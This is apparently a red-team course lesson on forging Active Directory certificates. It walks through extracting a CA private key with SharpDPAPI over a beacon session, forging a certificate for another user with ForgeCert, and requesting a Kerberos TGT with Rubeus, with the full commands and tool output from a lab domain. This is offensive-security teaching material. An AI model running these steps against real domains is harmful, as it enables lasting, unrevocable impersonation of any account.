# Forged Certificates

In larger organisations, the AD CS roles are usually installed on separate servers rather than on the domain controllers themselves, and those servers are often not treated with the same sensitivity as DCs. So, whereas only Enterprise Admins and Domain Admins can access and manage DCs, "lower level" roles such as server admins can often access the CAs. Although this can be seen as a privilege escalation, it's just as useful as a domain persistence method.

Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate for any principal in the domain (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA certificate is 5 years, but this can be set to any value during setup, sometimes as high as 10+ years. Because the CA never issued a forged certificate, it has no record of it, cannot revoke it, and resetting the target account's password does not invalidate it; the persistence only ends when the CA is renewed with a new key pair.

Once on a CA with local admin (SYSTEM) access, [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) can decrypt the machine's DPAPI-protected certificate private keys, including the CA's own.

```
beacon> run hostname
dc-2

beacon> getuid
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
```

![](https://files.cdn.thinkific.com/file_uploads/584845/images/73c/76e/766/sub-ca-key.png)

Save the private key and certificate (as shown in the SharpDPAPI output) to a `.pem` file and convert it to a `.pfx` with openssl. Then, build the forged certificate with [ForgeCert](https://github.com/GhostPack/ForgeCert), giving the target account's UPN as the `SubjectAltName`.

```
PS C:\Users\Attacker> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123
CA Certificate Information:
  Subject:        CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
  Issuer:         CN=ca, DC=cyberbotic, DC=io
  Start Date:     8/15/2022 4:06:13 PM
  End Date:       8/15/2024 4:16:13 PM
  Thumbprint:     697B1C2CD65B2ADC80C3D0CE83A6FB889B0CA08E
  Serial:         13000000046EF818036CF8C99F000000000004

Forged Certificate Information:
  Subject:        CN=User
  SubjectAltName: nlamb@cyberbotic.io
  Issuer:         CN=sub-ca, DC=dev, DC=cyberbotic, DC=io
  Start Date:     10/5/2022 1:24:23 PM
  End Date:       10/5/2023 1:24:23 PM
  Thumbprint:     0CF404F5D1534854BA5EDEC5953ED7B7BE96C3A8
  Serial:         00978D5E506AE605589E43F21D17E56671

Done. Saved forged certificate to .\Desktop\fake.pfx with the password 'pass123'
```


Even though you can specify any SubjectAltName, the account it names does need to exist in AD, because the DC maps the certificate to a principal by that UPN during PKINIT. Note also that domain controllers enforcing strong certificate mapping (KB5014754) reject a certificate like the one above, which carries only a UPN SAN and no SID security extension, unless the account has an explicit `altSecurityIdentities` mapping for it. We can now use Rubeus to request a legitimate TGT with this forged certificate.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap
```


We're not limited to forging user certificates; we can do the same for machine accounts. Combine this with the S4U2self trick (using the machine account's TGT to request a service ticket to that host on behalf of any user) to gain access to any machine or service in the domain.
